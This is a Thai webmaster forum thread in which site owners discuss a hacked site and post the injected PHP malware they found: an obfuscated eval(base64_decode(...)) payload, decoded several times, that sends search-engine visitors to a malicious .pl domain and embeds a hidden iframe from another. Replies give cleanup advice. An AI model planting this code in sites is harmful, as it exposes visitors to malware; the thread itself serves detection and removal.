ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comความรู้ทั่วไปGooooooooooooogleไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
หน้า: [1] 2  ทั้งหมด   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5  (อ่าน 3866 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
itmicrobit
สมุนแก๊งเสียว
*

พลังน้ำใจ: 33
ออฟไลน์ ออฟไลน์

กระทู้: 799



ดูรายละเอียด เว็บไซต์
« เมื่อ: 03 พฤศจิกายน 2010, 02:38:59 »

โค๊ด:
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2FsYXBvdHJlbW5iYS5vc2EucGwvcmlmLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCn1lbHNlIHsNCmVjaG8gIjxpZnJhbWUgc3JjPSdodHRwOi8vcnRqaHRleWp0eWp0eWoub3JnZS5wbC9tZG0vJyBmcmFtZWJvcmRlcj0wIGhlaWdodD0xIHdpZHRoPTEgc2Nyb2xsaW5nPW5vPjwvaWZyYW1lPiI7DQp9DQoJfQ==")); 

แบบเนี้ย ครายโดน
เวลา seach google ก็โดนแบน เลย


ไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ

« แก้ไขครั้งสุดท้าย: 03 พฤศจิกายน 2010, 02:39:40 โดย itmicrobit » บันทึกการเข้า
navico
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 108
ออฟไลน์ ออฟไลน์

กระทู้: 2,315



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 03 พฤศจิกายน 2010, 02:50:51 »

ยังโดนกันเรื่อยๆใช่ไหมนี่...
บันทึกการเข้า
mahaboyd
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 500
ออฟไลน์ ออฟไลน์

กระทู้: 4,830



ดูรายละเอียด
« ตอบ #2 เมื่อ: 03 พฤศจิกายน 2010, 02:53:17 »

โค๊ด:
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alapotremnba.osa.pl/rif/");
exit();
}
}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
}
บันทึกการเข้า

Internet Marketing Never Die!!~~   Cool
itmicrobit
สมุนแก๊งเสียว
*

พลังน้ำใจ: 33
ออฟไลน์ ออฟไลน์

กระทู้: 799



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 03 พฤศจิกายน 2010, 02:58:58 »

รึว่า มันเป็นช่องโหว่ ทาง Php เลย อะ เฮ้อ
หรือช่องโหว่ทาง Wordpress
หรือช่องโหว่ ทาง MySql
หรือช่องโหว่ ทาง permission
หรือ server โดน Hack
หรือ อาไร
= ='
« แก้ไขครั้งสุดท้าย: 03 พฤศจิกายน 2010, 04:12:11 โดย itmicrobit » บันทึกการเข้า
sugar
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 113
ออฟไลน์ ออฟไลน์

กระทู้: 4,647



ดูรายละเอียด เว็บไซต์
« ตอบ #4 เมื่อ: 03 พฤศจิกายน 2010, 05:38:01 »

 wanwan035 สงสัยโดนเต็มๆๆ ไม่น่าละเว็บหายไปเลย ถามหน่อยครับในไฟล configuration.php ของ joomla มานมี base64_decode หรือปล่าว

 wanwan035 ทำไม่เรามีหว่า  Tongue
บันทึกการเข้า

itmicrobit
สมุนแก๊งเสียว
*

พลังน้ำใจ: 33
ออฟไลน์ ออฟไลน์

กระทู้: 799



ดูรายละเอียด เว็บไซต์
« ตอบ #5 เมื่อ: 03 พฤศจิกายน 2010, 06:20:26 »

ตกลง มัน คี๊อ   Sad
บันทึกการเข้า
หนุกหนาน
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 106
ออฟไลน์ ออฟไลน์

กระทู้: 1,243



ดูรายละเอียด
« ตอบ #6 เมื่อ: 03 พฤศจิกายน 2010, 06:33:24 »

โค๊ด:
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alapotremnba.osa.pl/rif/");
exit();
}
}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
}

อันนี้ถอดมาหรือครับ
บันทึกการเข้า
itmicrobit
สมุนแก๊งเสียว
*

พลังน้ำใจ: 33
ออฟไลน์ ออฟไลน์

กระทู้: 799



ดูรายละเอียด เว็บไซต์
« ตอบ #7 เมื่อ: 03 พฤศจิกายน 2010, 06:37:35 »


โค๊ด:
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alapotremnba.osa.pl/rif/");
exit();
}
}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
}



อันนี้ รู้แล้ว แต่ วิธีการแก้ ปัญหา คื๊อ.........
บันทึกการเข้า
foxrank
คนรักเสียว
*

พลังน้ำใจ: 214
ออฟไลน์ ออฟไลน์

กระทู้: 156



ดูรายละเอียด เว็บไซต์
« ตอบ #8 เมื่อ: 03 พฤศจิกายน 2010, 07:10:46 »

eval(base64_decode)  เป็นการเข้ารหัสของ PHP ซึ่ง code ภายในจะถูกซ่อนไว้ และจะถูกเรียกจาก remote server
ซึ่ง Server ปลายทางสามารถส่ง virus, cookie stuff หรือ auto run ต่าง ๆ ลงในเครื่องของ visitor เรา

ส่วนใหญ่เราจะเจอ eval(base64_decode) นี้จากพวก wordpress theme, joomla them ที่เอามาแชร์กัน (ของฟรีไม่มีในโลกครับ)
แต่ถ้าหากใครยังชอบของฟรีอยู่ แนะนำง่าย ๆ ครับ

พอ download  theme มา ให้เช็คทุก file ว่ามี code นี้ติดมาหรือเปล่า ถ้ามีติดมาให้ลบทั้ง code แล้ว run บน localhost ดูว่าใช้ได้ไหม
ถ้า theme ยังสามารถใช้งานได้ตามปกติ ก็โอเค แต่ถ้าหากใช้งานไม่ได้ก็เสียใจครับ

หากใครใช้ dream weaver ก็ ใช้  CTRL + F , ใส่ “eval(base64_decode” แล้ว run ครับเพื่อเช็ค
อีกอย่างหนึ่งหากได้ theme ที่ฟรีมา นอกจาก run eval(base64_decode เข็คแล้วให้ เช็คดูด้วยว่า มี Iframe ด้วยไหม
หากมี ก็ดูว่า iframe จาก web ไหนหากไม่แน่ใจให้ลบทิ้งครับ

เกือบลืม FTP ที่ใช้แนะนำให้ใช้ FileZilla เพราะหากใช้ตัว FTP ต่าง ๆ ที่ crack มาใช้ในการ FTP คุณกำลังเปิดประตู hosting ให้กับผู้อื่นสามารถเข้ามาให้ครับ
บันทึกการเข้า

หนุกหนาน
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 106
ออฟไลน์ ออฟไลน์

กระทู้: 1,243



ดูรายละเอียด
« ตอบ #9 เมื่อ: 03 พฤศจิกายน 2010, 08:26:25 »


โค๊ด:
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alapotremnba.osa.pl/rif/");
exit();
}
}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
}



อันนี้ รู้แล้ว แต่ วิธีการแก้ ปัญหา คื๊อ.........



วิธีแก้หรือครับ
ก็ในเมื่อถอดออกมาได้โค้ดตามที่ว่ามา ก็ลบ พวกโค้ดเข้ารหัสเหล่านั้นออก แล้วเอาโค้ดที่ถอกออกมานี้ไปใส่แทน
โดยดัดแปลงบางส่วน เช่น เอา echo iframe ออก
บันทึกการเข้า
bird35793
คนรักเสียว
*

พลังน้ำใจ: 6
ออฟไลน์ ออฟไลน์

กระทู้: 162



ดูรายละเอียด เว็บไซต์
« ตอบ #10 เมื่อ: 03 พฤศจิกายน 2010, 09:30:35 »

ผมก็เคยโดนนะครับ วิธีแก้ที่แท้จริงผมยังไม่ได้ลองนะครับ
แต่ตอนที่ผมแก้ก็ใช้ text editor ตัวไหนก็ได้ครับเข้าไปค้นหาแล้วก็ลบออก
ส่วนใหญ่โค๊ดนี้จะอยู่ล่าง ๆๆๆ ของ หน้านั้นคับ

แต่เท่าที่ผมลองดูนะครับ เหมือนตอนนั้นผมจะ search ใน dream แล้วไม่เจออะครับ
ถ้าไม่ไงก็ลองเปิดจาก text editor ตัวอื่นอย่างพวก editplus ก็ได้นะครับ

ส่วนเรื่อง ftp แนะนำตัว filezilla อีกคนนะครับ
ตอนนั้นที่ใช้ cute ftp อยู่ รู้สึก โปรแกรม anti ไวรัสผมจะมองเป็นไวรัสนะครับ

หวังว่าจะมีคนหาวิธีแก้ที่ดีกว่านี้นะครับ ๆๆๆๆ Tongue
บันทึกการเข้า

batdboyz
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 177
ออฟไลน์ ออฟไลน์

กระทู้: 1,543



ดูรายละเอียด เว็บไซต์
« ตอบ #11 เมื่อ: 03 พฤศจิกายน 2010, 09:33:16 »

ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'
บันทึกการเข้า
nutt49
Newbie
*

พลังน้ำใจ: 3
ออฟไลน์ ออฟไลน์

กระทู้: 51



ดูรายละเอียด
« ตอบ #12 เมื่อ: 03 พฤศจิกายน 2010, 09:53:04 »

ผมโดนมาแล้ว 2 ครั้ง ลบกันหน้ามึดเลย ดีนะที่เครื่องแรง
บันทึกการเข้า
pjgunner
คนรักเสียว
*

พลังน้ำใจ: 6
ออฟไลน์ ออฟไลน์

กระทู้: 106



ดูรายละเอียด เว็บไซต์
« ตอบ #13 เมื่อ: 03 พฤศจิกายน 2010, 10:31:30 »

ปรกติ เราไม่ค่อยใช้ eval กันเท่าไหร่

ใช้ dream search entire local site ด้วย "eval("
บันทึกการเข้า

samabois
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 124
ออฟไลน์ ออฟไลน์

กระทู้: 1,851



ดูรายละเอียด เว็บไซต์
« ตอบ #14 เมื่อ: 03 พฤศจิกายน 2010, 12:05:43 »

eval(base64_decode)  เป็นการเข้ารหัสของ PHP ซึ่ง code ภายในจะถูกซ่อนไว้ และจะถูกเรียกจาก remote server
ซึ่ง Server ปลายทางสามารถส่ง virus, cookie stuff หรือ auto run ต่าง ๆ ลงในเครื่องของ visitor เรา

ส่วนใหญ่เราจะเจอ eval(base64_decode) นี้จากพวก wordpress theme, joomla them ที่เอามาแชร์กัน (ของฟรีไม่มีในโลกครับ)
แต่ถ้าหากใครยังชอบของฟรีอยู่ แนะนำง่าย ๆ ครับ

พอ download  theme มา ให้เช็คทุก file ว่ามี code นี้ติดมาหรือเปล่า ถ้ามีติดมาให้ลบทั้ง code แล้ว run บน localhost ดูว่าใช้ได้ไหม
ถ้า theme ยังสามารถใช้งานได้ตามปกติ ก็โอเค แต่ถ้าหากใช้งานไม่ได้ก็เสียใจครับ

หากใครใช้ dream weaver ก็ ใช้  CTRL + F , ใส่ “eval(base64_decode” แล้ว run ครับเพื่อเช็ค
อีกอย่างหนึ่งหากได้ theme ที่ฟรีมา นอกจาก run eval(base64_decode เข็คแล้วให้ เช็คดูด้วยว่า มี Iframe ด้วยไหม
หากมี ก็ดูว่า iframe จาก web ไหนหากไม่แน่ใจให้ลบทิ้งครับ

เกือบลืม FTP ที่ใช้แนะนำให้ใช้ FileZilla เพราะหากใช้ตัว FTP ต่าง ๆ ที่ crack มาใช้ในการ FTP คุณกำลังเปิดประตู hosting ให้กับผู้อื่นสามารถเข้ามาให้ครับ


อีกตัวที่แนะนำว่าดีกว่าไฟล์ซิลล่าก็

WinSCP ครับ ฟรีแวร์ แต่เร็วได้ใจ
บันทึกการเข้า

"ความล้มเหลว" มันก็แค่ "อุปสรรคชั่วคราว" เท่านั้น ไม่ได้เป็น "ข้ออ้าง" สำหรับคนที่ "มุ่งมั่น"
ขาย โดเมนUNITED.IN.TH 30,000 บาท ติดต่อมาได้เลย
เริ่มโปรเจ็คเพื่อโลกสวย....Hello World !!!
KidTorB
Verified Seller
ก๊วนเสียว
*

พลังน้ำใจ: 44
ออฟไลน์ ออฟไลน์

กระทู้: 229



ดูรายละเอียด เว็บไซต์
« ตอบ #15 เมื่อ: 03 พฤศจิกายน 2010, 12:10:14 »

อัพผ่าน host สบายใจสุดแล้วครับ  wanwan035
บันทึกการเข้า
Hikkie
ก๊วนเสียว
*

พลังน้ำใจ: 16
ออฟไลน์ ออฟไลน์

กระทู้: 325



ดูรายละเอียด
« ตอบ #16 เมื่อ: 03 พฤศจิกายน 2010, 13:01:04 »

FileZilla ระวังนะครับ เก็บรหัสผ่านที่อยู่โฮส เป็น text file บนเครื่องที่ติดตั้งครับ
บันทึกการเข้า
bird35793
คนรักเสียว
*

พลังน้ำใจ: 6
ออฟไลน์ ออฟไลน์

กระทู้: 162



ดูรายละเอียด เว็บไซต์
« ตอบ #17 เมื่อ: 03 พฤศจิกายน 2010, 14:06:56 »

ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

ที่ลบไม่ได้นี้คือยังไงอะครับ ต้องถามก่อนว่าแก้ผ่าน wp โดยตรงหรือเปล่าอะครับ
หรือว่าแก้ผ่าน text editor แล้วค่อยอัพขึ้นไปอะคับ
อย่าที่ได้แนะนำไว้คับ ถ้าแก้ผ่าน text editor รู้สึกว่าใน dream ผมจะลบไม่ได้นะครับ
ผมเลยใช่ตัวอื่นลบอะครับ ลองดูแล้วกันนะครับว่าได้หรือเปล่า Tongue
บันทึกการเข้า

puma1420
Newbie
*

พลังน้ำใจ: 4
ออฟไลน์ ออฟไลน์

กระทู้: 47



ดูรายละเอียด
« ตอบ #18 เมื่อ: 03 พฤศจิกายน 2010, 14:08:24 »

 wanwan008
บันทึกการเข้า

batdboyz
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 177
ออฟไลน์ ออฟไลน์

กระทู้: 1,543



ดูรายละเอียด เว็บไซต์
« ตอบ #19 เมื่อ: 03 พฤศจิกายน 2010, 14:11:24 »

ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

ที่ลบไม่ได้นี้คือยังไงอะครับ ต้องถามก่อนว่าแก้ผ่าน wp โดยตรงหรือเปล่าอะครับ
หรือว่าแก้ผ่าน text editor แล้วค่อยอัพขึ้นไปอะคับ
อย่าที่ได้แนะนำไว้คับ ถ้าแก้ผ่าน text editor รู้สึกว่าใน dream ผมจะลบไม่ได้นะครับ
ผมเลยใช่ตัวอื่นลบอะครับ ลองดูแล้วกันนะครับว่าได้หรือเปล่า Tongue

ขอบคุณคับ เดี๋ยวไว้ไปลอง ผมลบผ่าน text editor นี่แหละ
บันทึกการเข้า
หน้า: [1] 2  ทั้งหมด   ขึ้นบน
พิมพ์